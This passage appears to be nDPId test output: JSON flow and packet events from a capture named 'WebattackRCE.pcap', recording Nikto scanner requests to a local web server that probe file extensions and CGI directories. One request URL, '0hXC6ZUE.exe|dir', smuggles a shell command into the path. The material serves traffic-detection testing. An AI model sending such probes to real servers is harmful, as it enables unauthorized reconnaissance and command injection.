01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276690,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1576420276690,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276690,"pkt":"AAAAAAAAAAAAAAAACABFAADErQxAAEAGjyV\/AAABfwAAAcG0H5DNO5UfftfaRYAYAED+uAAAAQEICp1m+vqdZvr6R0VUIC8waFhDNlpVRS5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276690,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276692,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1576420276692,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276692,"pkt":"AAAAAAAAAAAAAAAACABFAADEWZ5AAEAG4pN\/AAABfwAAAcG2H5D\/SmGKHR\/Uy4AYAED+uAAAAQEICp1m+vydZvr7R0VUIC8waFhDNlpVRS5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276692,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276694,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1576420276694,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276694,"pkt":"AAAAAAAAAAAAAAAACABFAADIBvJAAEAGNTx\/AAABfwAAAcG4H5DthT7meWwMh4AYAED+vAAAAQEICp1m+v6dZvr9R0VUIC8waFhDNlpVRS5leGV8ZGlyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276694,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1576420276695,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276695,"pkt":"AAAAAAAAAAAAAAAACABFAADCG\/NAAEAGIEF\/AAABfwAAAcG6H5DzUiPolNWjYoAYAED+tgAAAQEICp1m+v+dZvr\/R0VUIC9pbmRleC5waHA\/IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQoNCg=="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276697,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1576420276697,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276697,"pkt":"AAAAAAAAAAAAAAAACABFAADEgRRAAEAGux1\/AAABfwAAAcG8H5ABRrkFDdcmsoAYAED+uAAAAQEICp1m+wGdZvsBR0VUIC9jZ2kuY2dpLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276697,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi.cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1576420276699,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276699,"pkt":"AAAAAAAAAAAAAAAACABFAADDtolAAEAGhal\/AAABfwAAAcG+H5DlK46S3uw4X4AYAED+twAAAQEICp1m+wKdZvsCR0VUIC93ZWJjZ2kvIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KDQo="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1576420276701,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276701,"pkt":"AAAAAAAAAAAAAAAACABFAADEOWhAAEAGAsp\/AAABfwAAAcHAH5CIUQFyvT1whIAYAED+uAAAAQEICp1m+wWdZvsFR0VUIC9jZ2ktOTE0LyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-914\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1576420276703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276703,"pkt":"AAAAAAAAAAAAAAAACABFAADEOclAAEAGAml\/AAABfwAAAcHCH5AyFgHRa7MhPoAYAED+uAAAAQEICp1m+wadZvsGR0VUIC9jZ2ktOTE1LyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-915\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276704,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1576420276704,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276704,"pkt":"AAAAAAAAAAAAAAAACABFAADAObpAAEAGAnx\/AAABfwAAAcHEH5ArBQGh2qRxvoAYAED+tAAAAQEICp1m+widZvsIR0VUIC9iaW4vIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276704,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1576420276705,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276705,"pkt":"AAAAAAAAAAAAAAAACABFAADARJ1AAEAG95h\/AAABfwAAAcHGH5BoLnyEpCdA\/4AYAED+tAAAAQEICp1m+wmdZvsJR0VUIC9jZ2kvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276707,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1576420276707,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276707,"pkt":"AAAAAAAAAAAAAAAACABFAADCUelAAEAG6kp\/AAABfwAAAcHIH5DIZGoAvjYJ64AYAED+tgAAAQEICp1m+wudZvsLR0VUIC9tcGNnaS8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQoNCg=="}
